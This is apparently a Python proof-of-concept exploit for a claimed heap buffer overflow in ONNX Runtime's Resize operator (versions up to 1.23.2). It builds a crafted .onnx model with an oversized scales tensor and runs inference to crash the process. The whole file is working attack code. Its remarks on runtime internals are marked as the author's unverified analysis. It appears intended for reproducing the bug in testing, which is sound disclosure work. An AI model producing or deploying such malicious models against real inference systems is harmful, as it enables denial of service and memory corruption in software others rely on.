#!/usr/bin/env python3
"""
PoC: ONNX Runtime Resize Op - Heap Buffer Overflow via ParseScalesData

Affected: onnxruntime <= 1.23.2 (all platforms)
Trigger:  Load and run crafted .onnx model → segfault

NOTE(review): the statements in this file about ONNX Runtime internals
(ParseScalesData, the memcpy sizes, the scales-caching rule) are the PoC
author's analysis. Nothing in this script verifies them; confirm against the
onnxruntime sources for the version under test.

Intended for reproducing the crash in a controlled test environment only.
"""

import numpy as np
import onnx
from onnx import helper, TensorProto, numpy_helper

# Size in bytes of one float32 element of the scales tensor.
_FLOAT32_BYTES = 4
# Shape of the NCHW input fed to the model; its length is the input rank,
# i.e. the number of scales a well-formed Resize node would carry.
_INPUT_SHAPE = (1, 3, 8, 8)
_INPUT_RANK = len(_INPUT_SHAPE)
# Default-domain opset version the generated model declares.
_OPSET_VERSION = 19


def create_malicious_model(
    output_path: str = "poc_resize_overflow.onnx", n_scales: int = 256
) -> str:
    """Build and save an ONNX model whose Resize node has an oversized scales tensor.

    The graph contains a single ``Resize`` node (mode ``nearest``) with inputs
    ``X``, an empty ``roi`` and an initializer ``scales`` holding ``n_scales``
    float32 values of 2.0. ``X`` and ``Y`` are declared without any shape.

    Per the PoC author's analysis (not verifiable from this file), running the
    model with a 4-D input makes the runtime copy ``n_scales * 4`` bytes into
    a buffer sized for 4 floats (16 bytes).

    Args:
        output_path: File path the model is written to.
        n_scales: Number of elements in the ``scales`` initializer.

    Returns:
        ``output_path``, unchanged.
    """
    # Scales tensor: n_scales floats, all 2.0 (attacker-controlled content).
    malicious_scales = np.full(n_scales, 2.0, dtype=np.float32)

    # Resize node inputs: X[0], roi[1] = empty (omitted), scales[2] = oversized.
    resize_node = helper.make_node(
        "Resize",
        inputs=["X", "", "scales"],
        outputs=["Y"],
        mode="nearest",
    )

    # X and Y carry no shape annotation, so the rank is unknown when the
    # graph is built. The PoC author states this prevents the runtime from
    # caching the scales (opset >= 18 reportedly needs rank > 0 to cache).
    X_input = helper.make_tensor_value_info("X", TensorProto.FLOAT, None)
    Y_output = helper.make_tensor_value_info("Y", TensorProto.FLOAT, None)

    # Scales are supplied as a model initializer (a constant in the graph).
    scales_init = numpy_helper.from_array(malicious_scales, name="scales")

    graph = helper.make_graph(
        [resize_node],
        "poc_resize_overflow",
        [X_input],
        [Y_output],
        initializer=[scales_init],
    )

    model = helper.make_model(
        graph,
        opset_imports=[helper.make_opsetid("", _OPSET_VERSION)],
    )
    model.ir_version = 9

    onnx.save(model, output_path)

    print(f"[+] Malicious model saved: {output_path}")
    print(
        f" scales tensor: {n_scales} elements "
        f"(expected: {_INPUT_RANK} for NCHW input)"
    )
    print(f" opset: {_OPSET_VERSION}, input X shape: dynamic (rank unknown)")
    return output_path


def trigger(model_path: str, n_scales: int = 256) -> None:
    """Load the model at ``model_path`` and run one inference on a 4-D input.

    Prints the expected buffer and copy sizes before running. If
    ``sess.run`` raises a Python exception it is reported; if it returns
    normally, "No crash detected" is printed. A native crash of the process
    cannot be caught here.

    Args:
        model_path: Path of the ONNX model to load.
        n_scales: Number of scales elements the model was built with; used
            only for the diagnostic output. Defaults to the same value as
            ``create_malicious_model``.
    """
    # Imported lazily so the model can be generated without onnxruntime.
    import onnxruntime as ort

    print(f"\n[*] Loading model: {model_path}")
    opts = ort.SessionOptions()
    opts.log_severity_level = 3
    sess = ort.InferenceSession(model_path, opts)

    # 4-D NCHW input. Per the PoC author's analysis, Compute() sizes its
    # scales array from this rank while the copy uses the tensor's length.
    input_data = np.random.randn(*_INPUT_SHAPE).astype(np.float32)

    capacity_bytes = _INPUT_RANK * _FLOAT32_BYTES
    copy_bytes = n_scales * _FLOAT32_BYTES

    print("[*] Running inference...")
    print(f" scales_array capacity: ~{capacity_bytes} bytes ({_INPUT_RANK} floats)")
    print(f" memcpy size: {copy_bytes} bytes ({n_scales} floats)")
    print(" expected: heap/stack corruption -> crash")

    try:
        sess.run(None, {"X": input_data})
    except Exception as e:
        # Top-level boundary of the PoC: report whatever the runtime raised.
        print(f"[!] Exception: {e}")
    else:
        print("[?] No crash detected")


def main() -> None:
    """Generate the model with default settings, then load and run it."""
    model_path = create_malicious_model()
    trigger(model_path)


if __name__ == "__main__":
    main()